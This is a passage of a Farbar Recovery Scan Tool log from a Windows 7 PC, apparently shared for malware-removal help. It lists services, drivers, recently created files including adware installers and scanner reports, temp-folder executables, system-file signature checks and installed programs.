S4 BackupService; C:\Users\BRIAN\AppData\Roaming\HP SimpleSave Application\uUACTokenSvc.exe [83512 2010-07-01] (ArcSoft, Inc.)
S4 HP Health Check Service; C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [125440 2009-09-24] (Hewlett-Packard) [File not signed]
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89864 2014-12-11] (Hewlett-Packard Company)
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2012-06-07] (SolidWorks) [File not signed]
S4 SQLANYs_SmpParts; C:\Program Files (x86)\SQL Anywhere 10\win32\dbsrv10.exe [136568 2010-12-08] (iAnywhere Solutions, Inc.)
R2 WDBackup; C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe [1042808 2014-07-22] (Western Digital Technologies, Inc.)
R2 WDDriveService; C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe [296312 2014-05-23] (Western Digital Technologies, Inc.)
S3 Blackberry Device Manager; "C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe" [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S4 LMIRfsClientNP; No ImagePath
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-07-19] (Corel Corporation)
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Research in Motion Ltd)
R2 Sentinel64; C:\Windows\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
S3 SNTUSB64; C:\Windows\System32\DRIVERS\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S2 LMIInfo; \??\C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-31 11:07 - 2014-12-31 11:07 - 00001094 _____ () C:\Users\BR\Desktop\FRST64(3) - Shortcut.lnk
2014-12-31 11:06 - 2014-12-31 11:06 - 02123264 _____ (Farbar) C:\Users\BR\Downloads\FRST64(3).exe
2014-12-31 11:05 - 2014-12-31 11:06 - 02123264 _____ (Farbar) C:\Users\BR\Downloads\FRST64(2).exe
2014-12-31 11:04 - 2014-12-31 11:04 - 02123264 _____ (Farbar) C:\Users\BR\Downloads\FRST64(1).exe
2014-12-31 11:03 - 2014-12-31 11:03 - 00003200 _____ () C:\Windows\System32\Tasks\YourFileDownloader Installer Starter
2014-12-31 10:59 - 2014-12-31 11:03 - 00008192 _____ () C:\Windows\SysWOW64\WDPABKP.dat
2014-12-31 10:54 - 2014-12-31 10:54 - 00044855 _____ () C:\Users\BR\Documents\JRT.txt
2014-12-31 10:53 - 2014-12-31 10:53 - 00044855 _____ () C:\Users\BR\Desktop\JRT.txt
2014-12-31 10:49 - 2014-12-31 10:49 - 01707939 _____ (Thisisu) C:\Users\BR\Downloads\JRT(2).exe
2014-12-31 10:44 - 2014-12-31 10:44 - 00008452 _____ () C:\Users\BR\Documents\AdwCleaner[S1].txt
2014-12-31 10:36 - 2014-12-31 10:36 - 00013286 _____ () C:\Users\BR\Desktop\AdwCleaner(1) - Shortcut.lnk
2014-12-31 10:30 - 2014-12-31 10:31 - 02173952 _____ () C:\Users\BR\Downloads\AdwCleaner(1).exe
2014-12-31 10:21 - 2014-12-31 10:21 - 00024778 _____ () C:\Users\BR\Documents\OTL file.txt
2014-12-24 16:26 - 2014-12-24 16:26 - 00003886 _____ () C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Guest\AppData\Local\Google
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Guest\AppData\Local\Comodo
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Guest
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\BRIAN\AppData\Local\Comodo
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\bcom\AppData\Local\Google
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\bcom\AppData\Local\Comodo
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Google
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Comodo
2014-12-24 16:15 - 2014-12-24 16:15 - 00000000 ____D () C:\Users\Administrator
2014-12-24 16:14 - 2014-12-24 18:32 - 00000000 ____D () C:\Users\BR\AppData\Local\hitsblender
2014-12-24 16:14 - 2014-12-24 16:14 - 00002679 _____ () C:\Windows\patsearch.bin
2014-12-24 16:14 - 2014-12-24 16:14 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_webinstrNewH_01009.Wdf
2014-12-24 16:13 - 2014-12-24 16:13 - 00003100 _____ () C:\Windows\System32\Tasks\Update Service HitsBlender
2014-12-24 16:13 - 2014-12-24 16:13 - 00001897 _____ () C:\Users\Public\Desktop\HitsBlender.lnk
2014-12-24 16:13 - 2014-12-24 16:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\HitsBlender
2014-12-24 16:13 - 2014-12-24 16:13 - 00000000 ____D () C:\Program Files (x86)\HitsBlender
2014-12-24 16:12 - 2014-12-24 16:12 - 03883888 _____ (http://yourfile-downloader.com) C:\Users\BR\Downloads\free_download_bobcat_753_parts_manual_pdf_downloader.exe
2014-12-18 04:44 - 2014-12-12 21:09 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-18 04:44 - 2014-12-12 19:33 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-14 12:08 - 2014-12-14 12:08 - 00002202 _____ () C:\Users\Public\Desktop\HP Officejet Pro 8620.lnk
2014-12-14 12:08 - 2014-12-14 12:08 - 00001154 _____ () C:\Users\Public\Desktop\Shop for Supplies - HP Officejet Pro 8620.lnk
2014-12-14 12:08 - 2014-07-21 16:31 - 00763912 ____N (Hewlett-Packard Development Company, LP) C:\Windows\system32\HPDiscoPM7012.dll
2014-12-14 11:41 - 2014-12-14 11:41 - 05165056 _____ () C:\Users\BR\Downloads\HPSupportSolutionsFramework-11.51.0048.msi
2014-12-14 11:13 - 2014-12-14 11:13 - 00000323 _____ () C:\Users\BR\Desktop\HP Printer Diagnostic Tools.url
2014-12-12 18:47 - 2014-12-12 18:47 - 00001271 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2014-12-12 18:47 - 2014-12-12 18:47 - 00001259 _____ () C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2014-12-10 03:02 - 2014-10-17 18:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-10 03:02 - 2014-10-17 17:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-09 21:59 - 2014-11-26 17:43 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-09 21:59 - 2014-11-26 17:10 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-09 21:59 - 2014-11-21 19:13 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-09 21:59 - 2014-11-21 19:06 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-09 21:59 - 2014-11-21 19:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-09 21:59 - 2014-11-21 18:50 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-09 21:59 - 2014-11-21 18:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-09 21:59 - 2014-11-21 18:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-09 21:59 - 2014-11-21 18:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-09 21:59 - 2014-11-21 18:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-09 21:59 - 2014-11-21 18:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-09 21:59 - 2014-11-21 18:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-09 21:59 - 2014-11-21 18:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-09 21:59 - 2014-11-21 18:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-09 21:59 - 2014-11-21 18:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-09 21:59 - 2014-11-21 18:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-09 21:59 - 2014-11-21 18:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-09 21:59 - 2014-11-21 18:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-09 21:59 - 2014-11-21 18:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-09 21:59 - 2014-11-21 18:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-09 21:59 - 2014-11-21 18:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-09 21:59 - 2014-11-21 18:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-09 21:59 - 2014-11-21 18:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-09 21:59 - 2014-11-21 18:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-09 21:59 - 2014-11-21 18:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-09 21:59 - 2014-11-21 18:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-09 21:59 - 2014-11-21 18:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-09 21:59 - 2014-11-21 18:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-09 21:59 - 2014-11-21 18:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-09 21:59 - 2014-11-21 17:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-09 21:59 - 2014-11-21 17:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-09 21:59 - 2014-11-21 17:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-09 21:59 - 2014-11-21 17:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-09 21:59 - 2014-11-21 17:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-09 21:59 - 2014-11-21 17:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-09 21:59 - 2014-11-21 17:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-09 21:59 - 2014-11-21 17:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-09 21:59 - 2014-11-21 17:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-09 21:59 - 2014-11-21 17:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-09 21:59 - 2014-11-21 17:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-09 21:59 - 2014-11-21 17:36 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-09 21:59 - 2014-11-21 17:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-09 21:59 - 2014-11-21 17:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-09 21:59 - 2014-11-21 17:29 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-09 21:59 - 2014-11-21 17:28 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-09 21:59 - 2014-11-21 17:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-09 21:59 - 2014-11-21 17:22 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-09 21:59 - 2014-11-21 17:21 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-09 21:59 - 2014-11-21 17:15 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-09 21:59 - 2014-11-21 17:13 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-09 21:59 - 2014-11-21 17:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-09 21:59 - 2014-11-21 17:00 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-09 21:59 - 2014-11-21 16:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-09 21:59 - 2014-11-21 16:54 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-09 21:59 - 2014-11-10 19:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-09 21:59 - 2014-11-10 18:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-09 21:59 - 2014-11-10 17:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-09 21:58 - 2014-11-07 19:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-09 21:58 - 2014-11-07 18:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-09 21:58 - 2014-10-29 18:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-09 21:58 - 2014-10-29 17:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-09 21:58 - 2014-10-02 18:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-09 21:58 - 2014-10-02 18:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-09 21:58 - 2014-10-02 18:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-09 21:58 - 2014-10-02 18:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-09 21:58 - 2014-10-02 18:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-09 21:58 - 2014-10-02 17:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-09 21:58 - 2014-10-02 17:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-09 21:58 - 2014-10-02 17:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-09 21:58 - 2014-10-02 17:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-09 21:58 - 2014-10-02 17:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-31 11:10 - 2014-01-26 09:15 - 00025328 _____ () C:\Users\BR\Downloads\FRST.txt
2014-12-31 11:09 - 2014-01-26 09:13 - 00000000 ____D () C:\FRST
2014-12-31 11:09 - 2012-04-18 07:43 - 00000000 ____D () C:\Users\BR\AppData\Roaming\Skype
2014-12-31 11:09 - 2009-07-13 20:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-31 11:09 - 2009-07-13 20:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-31 11:05 - 2012-03-13 05:12 - 01382708 _____ () C:\Windows\WindowsUpdate.log
2014-12-31 11:04 - 2009-07-13 21:13 - 00786622 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-31 11:03 - 2012-04-01 19:31 - 00000000 ____D () C:\Users\BR\AppData\Local\Adobe
2014-12-31 10:58 - 2014-11-20 08:35 - 00000000 ___RD () C:\Users\BR\iCloudDrive
2014-12-31 10:58 - 2014-09-07 00:00 - 00012124 _____ () C:\Windows\setupact.log
2014-12-31 10:58 - 2014-05-02 18:02 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-31 10:58 - 2014-02-11 22:13 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-12-31 10:58 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-31 10:44 - 2014-05-13 18:36 - 00000000 ____D () C:\Program Files (x86)\TradeManager
2014-12-31 10:40 - 2014-09-07 11:12 - 01547176 _____ () C:\Windows\PFRO.log
2014-12-31 10:39 - 2014-01-25 06:55 - 00000000 ____D () C:\AdwCleaner
2014-12-31 10:39 - 2012-04-13 07:31 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-12-31 10:39 - 2012-04-01 10:22 - 00000000 ____D () C:\Users\BR
2014-12-31 10:37 - 2014-05-02 18:02 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-30 12:01 - 2014-01-23 21:11 - 00120436 _____ () C:\Users\BR\Downloads\Extras.Txt
2014-12-30 12:00 - 2014-01-23 21:11 - 00321938 _____ () C:\Users\BR\Downloads\OTL.Txt
2014-12-26 13:18 - 2014-11-02 22:30 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-24 17:38 - 2009-07-13 21:32 - 00000000 ____D () C:\Windows\addins
2014-12-24 16:37 - 2013-08-07 07:46 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-12-24 16:27 - 2009-07-13 18:34 - 00000615 _____ () C:\Windows\win.ini
2014-12-24 16:20 - 2012-04-18 22:25 - 00000000 ____D () C:\Program Files (x86)\Google
2014-12-24 16:15 - 2012-05-05 16:39 - 00000000 ____D () C:\Users\BR\AppData\Local\Google
2014-12-24 16:15 - 2012-03-13 04:27 - 00000000 ____D () C:\Users\BRIAN\AppData\Local\Google
2014-12-18 16:48 - 2012-03-13 04:34 - 00000000 ____D () C:\Users\BR\Documents\TUMBLEWEED INVOICES
2014-12-15 08:33 - 2014-11-02 22:29 - 00001064 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-15 08:33 - 2014-11-02 22:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-15 08:33 - 2014-11-02 22:29 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-14 12:09 - 2014-09-04 10:42 - 00003600 _____ () C:\Windows\System32\Tasks\HPCustParticipation HP Officejet Pro 8620
2014-12-14 12:08 - 2012-03-13 07:16 - 00000000 ____D () C:\ProgramData\HP
2014-12-14 12:08 - 2009-12-17 12:12 - 00000000 ____D () C:\Program Files (x86)\hp
2014-12-14 12:07 - 2012-04-25 17:33 - 00000000 ____D () C:\Users\BR\AppData\Local\HP
2014-12-14 11:15 - 2013-12-11 14:52 - 00001966 _____ () C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
2014-12-14 11:14 - 2012-04-01 10:22 - 00000000 ____D () C:\Users\BR\AppData\Local\Hewlett-Packard
2014-12-14 11:13 - 2012-04-04 15:59 - 00000000 ____D () C:\Users\BR\AppData\Roaming\HpUpdate
2014-12-12 18:46 - 2012-03-13 13:46 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-12-10 04:04 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\rescache
2014-12-10 03:26 - 2012-04-26 05:33 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-12-10 03:24 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-10 03:09 - 2012-03-13 15:46 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-10 03:08 - 2013-08-16 11:47 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-10 03:04 - 2012-03-14 08:27 - 112710672 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-12-09 08:42 - 2013-08-15 07:42 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk

Some content of TEMP:
====================
C:\Users\BR\AppData\Local\Temp\0D12D2EF-6A1F-95C3-7F23-13AFBADCD72A.exe
C:\Users\BR\AppData\Local\Temp\18be6784_.exe
C:\Users\BR\AppData\Local\Temp\294823_.exe
C:\Users\BR\AppData\Local\Temp\60652C4D-951D-AA27-10C9-A8E6DBFEE53C.dll
C:\Users\BR\AppData\Local\Temp\60652C4D-951D-AA27-10C9-A8E6DBFEE53C.exe
C:\Users\BR\AppData\Local\Temp\amisetup1842__11005.exe
C:\Users\BR\AppData\Local\Temp\CreativeCloudSet-Up.exe
C:\Users\BR\AppData\Local\Temp\DTiGJMMbx9.exe
C:\Users\BR\AppData\Local\Temp\hQjiIjKj8H.exe
C:\Users\BR\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\BR\AppData\Local\Temp\optprosetup.exe
C:\Users\BR\AppData\Local\Temp\Quarantine.exe
C:\Users\BR\AppData\Local\Temp\REKlupSXas.exe
C:\Users\BR\AppData\Local\Temp\sdf987C.exe
C:\Users\BR\AppData\Local\Temp\sdf987D.exe
C:\Users\BR\AppData\Local\Temp\SkypeSetup.exe
C:\Users\BR\AppData\Local\Temp\sqlite3.dll
C:\Users\BR\AppData\Local\Temp\wVNAGDk9H9.exe
C:\Users\BR\AppData\Local\Temp\YourFileDownloaderkmkz37hunb.exe
C:\Users\BR\AppData\Local\Temp\YourFileDownloaderpoWld6tLtZ.exe
C:\Users\BR\AppData\Local\Temp\YourFileDownloaderwGGi7ERCID.exe
C:\Users\BR\AppData\Local\Temp\YourFileDownloaderyJOqJto7zU.exe
C:\Users\BR\AppData\Local\Temp\YourFileDownloaderzG3KPlOXcd.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-25 00:26

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-12-2014
Ran by BR at 2014-12-31 11:10:41
Running from C:\Users\BR\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
ActiveCheck component for HP Active Support Library (x32 Version: 3.0.0.2 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.8.0.447 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.9 - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.9.900.152 - Adobe Systems Incorporated)
Adobe Flash Player 13 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 13.0.0.206 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.2.1 - Adobe Systems Incorporated)
Adobe Photoshop Elements 12 (HKLM-x32\...\Adobe Photoshop Elements 12) (Version: 12.1.0.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
AIO_CDA_ProductContext (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_CDA_Software (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_Scan (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
Akamai NetSession Interface (HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\Akamai) (Version:  - Akamai Technologies, Inc)
AliIM Plugins for Browser (HKU\S-1-5-21-998330651-303224156-1059126384-1004\...\AliIM Plugins for Browser) (Version: 1.0 - Alibaba(China) Co., Ltd)
AliSetup 0.1.0.52 (HKLM-x32\...\AliSetup) (Version: 0.1.0.52 - °¢Àï°Í°Í£¨Öйú£©ÓÐÏÞ¹«Ë¾)
Any Video Converter 3.5.8 (HKLM-x32\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AutoCAD 2011 - English (HKLM\...\AutoCAD 2011 - English) (Version: 18.1.49.0 - Autodesk)
